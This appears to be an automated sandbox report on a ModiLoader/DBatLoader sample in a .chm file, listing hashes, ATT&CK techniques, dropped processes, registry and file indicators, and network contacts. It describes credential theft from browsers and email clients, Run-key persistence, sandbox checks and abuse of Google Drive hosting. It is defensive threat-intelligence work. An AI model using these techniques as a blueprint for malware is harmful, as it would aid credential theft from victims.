modiloader | a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
21/01/2025, 03:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101.chm
Size

75KB
MD5

92588daadcf11b3311b82e8b20219340
SHA1

68c690da91c4a1cb0e7336b055ea87877a7b8b9d
SHA256

a8f92f91412bcf71275883d86a3df7fdcc29d7ac3104f261e6e5d71f033ee101
SHA512

38fa50cfad7f030712b9c8a81af995b0319075aa5e9ba3768d799bf13aa0532130d491bb6d90d0c8fbc2e8ffacc31e85629152d3281d4818eb8716d0f16cd523
SSDEEP

1536:PRReoi9mRqozQM8I3FInJQqcN8HSsIN2i5reqgdMb0OYqFHPf:5Rez9kTAoFI7jq2i6qgGbzYOn

Score

10^/10

modiloader collection defense_evasion discovery execution persistence spyware stealer trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader

ModiLoader Second Stage 61 IoCs

resource	yara_rule
behavioral2/memory/2344-50-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-56-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-60-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-66-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-92-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-76-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-114-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-113-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-112-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-110-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-109-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-108-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-107-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-106-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-105-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-103-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-104-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-100-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-98-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-95-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-111-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-87-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-84-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-102-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-82-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-101-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-80-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-79-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-97-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-78-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-96-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-94-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-77-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-93-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-91-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-75-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-90-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-65-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-89-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-74-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-88-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-73-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-64-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-86-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-72-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-85-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-83-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-71-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-70-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-81-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-69-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-68-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-67-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-59-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-63-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-62-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-61-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-58-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-57-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-55-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2
behavioral2/memory/2344-54-0x0000000002A20000-0x0000000003A20000-memory.dmp	modiloader_stage2

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
112	powershell.exe
1844	powershell.exe

Executes dropped EXE 32 IoCs

pid	Process
4400	ript.exe
2344	x.exe
1928	svchost.pif
3304	alpha.pif
2228	Upha.pif
1980	alpha.pif
1608	Upha.pif
4312	alpha.pif
2248	aken.pif
2548	xbnitqnH.pif
4512	alg.exe
1056	DiagnosticsHub.StandardCollector.Service.exe
5704	fxssvc.exe
5844	elevation_service.exe
6016	elevation_service.exe
6100	maintenanceservice.exe
2596	msdtc.exe
2432	OSE.EXE
3716	PerceptionSimulationService.exe
4740	perfhost.exe
5048	locator.exe
2416	SensorDataService.exe
3576	snmptrap.exe
2168	spectrum.exe
2688	ssh-agent.exe
5500	TieringEngineService.exe
4796	AgentService.exe
2248	vds.exe
4372	vssvc.exe
5144	wbengine.exe
5220	WmiApSrv.exe
5388	SearchIndexer.exe

Loads dropped DLL 1 IoCs

pid	Process
1928	svchost.pif

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	xbnitqnH.pif
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	xbnitqnH.pif
Key opened	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	xbnitqnH.pif

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hnqtinbx = "C:\\Users\\Public\\Hnqtinbx.url"	x.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
1260	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
23	drive.google.com
27	drive.google.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
39	checkip.dyndns.org
47	reallyfreegeoip.org
48	reallyfreegeoip.org

Drops file in System32 directory 31 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	xbnitqnH.pif
File opened for modification	C:\Windows\system32\msiexec.exe	xbnitqnH.pif
File opened for modification	C:\Windows\System32\OpenSSH\ssh-agent.exe	xbnitqnH.pif
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\7783b8df99262766.bin	alg.exe
File opened for modification	C:\Windows\System32\SensorDataService.exe	xbnitqnH.pif
File opened for modification	C:\Windows\system32\spectrum.exe	xbnitqnH.pif
File opened for modification	C:\Windows\system32\dllhost.exe	xbnitqnH.pif
File opened for modification	C:\Windows\System32\msdtc.exe	xbnitqnH.pif
File opened for modification	C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe	xbnitqnH.pif
File opened for modification	C:\Windows\SysWow64\perfhost.exe	xbnitqnH.pif
File opened for modification	C:\Windows\system32\locator.exe	xbnitqnH.pif
File opened for modification	C:\Windows\system32\vssvc.exe	xbnitqnH.pif
File opened for modification	C:\Windows\system32\SearchIndexer.exe	xbnitqnH.pif
File opened for modification	C:\Windows\system32\dllhost.exe	alg.exe
File opened for modification	C:\Windows\System32\SensorDataService.exe	alg.exe
File opened for modification	C:\Windows\system32\SgrmBroker.exe	alg.exe
File opened for modification	C:\Windows\system32\AppVClient.exe	xbnitqnH.pif
File opened for modification	C:\Windows\system32\SgrmBroker.exe	xbnitqnH.pif
File opened for modification	C:\Windows\system32\AgentService.exe	xbnitqnH.pif
File opened for modification	C:\Windows\system32\MSDtc\MSDTC.LOG	msdtc.exe
File opened for modification	C:\Windows\system32\AgentService.exe	alg.exe
File opened for modification	C:\Windows\System32\vds.exe	xbnitqnH.pif
File opened for modification	C:\Windows\system32\wbengine.exe	xbnitqnH.pif
File opened for modification	C:\Windows\system32\wbem\WmiApSrv.exe	xbnitqnH.pif
File opened for modification	C:\Windows\System32\alg.exe	xbnitqnH.pif
File opened for modification	C:\Windows\System32\snmptrap.exe	xbnitqnH.pif
File opened for modification	C:\Windows\system32\fxssvc.exe	alg.exe
File opened for modification	C:\Windows\system32\msiexec.exe	alg.exe
File opened for modification	C:\Windows\system32\fxssvc.exe	xbnitqnH.pif
File opened for modification	C:\Windows\system32\TieringEngineService.exe	xbnitqnH.pif
File opened for modification	C:\Windows\system32\AppVClient.exe	alg.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2344 set thread context of 2548	2344	x.exe	116

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\unpack200.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Windows Media Player\wmpnetwk.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\java.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\servertool.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Mozilla Firefox\crashreporter.exe	xbnitqnH.pif
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\mip.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\ieinstal.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\orbd.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\java.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\klist.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\rmic.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\rmid.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\pack200.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\schemagen.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE	xbnitqnH.pif
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateCore.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\serialver.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\private_browsing.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Common Files\microsoft shared\OFFICE16\LICLUA.EXE	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleCrashHandler64.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\iexplore.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jstack.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jhat.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\ielowutil.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_87484\javaws.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javah.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\rmiregistry.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Internet Explorer\ielowutil.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\klist.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\extcheck.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\keytool.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Java\jre-1.8\bin\javacpl.exe	alg.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe	alg.exe
File opened for modification	C:\Program Files\Internet Explorer\iediagcmd.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\policytool.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javafxpackager.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\ktab.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\extcheck.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jcmd.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\unpack200.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\ssvagent.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe	alg.exe
File opened for modification	C:\Program Files\7-Zip\7zG.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrmstp.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\ssvagent.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\rmiregistry.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\pingsender.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\updater.exe	alg.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe	xbnitqnH.pif
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jhat.exe	xbnitqnH.pif

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	xbnitqnH.pif
File opened for modification	C:\Windows\DtcInstall.log	msdtc.exe
File opened for modification	C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe	alg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xbnitqnH.pif

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	spectrum.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SensorDataService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	spectrum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	SensorDataService.exe
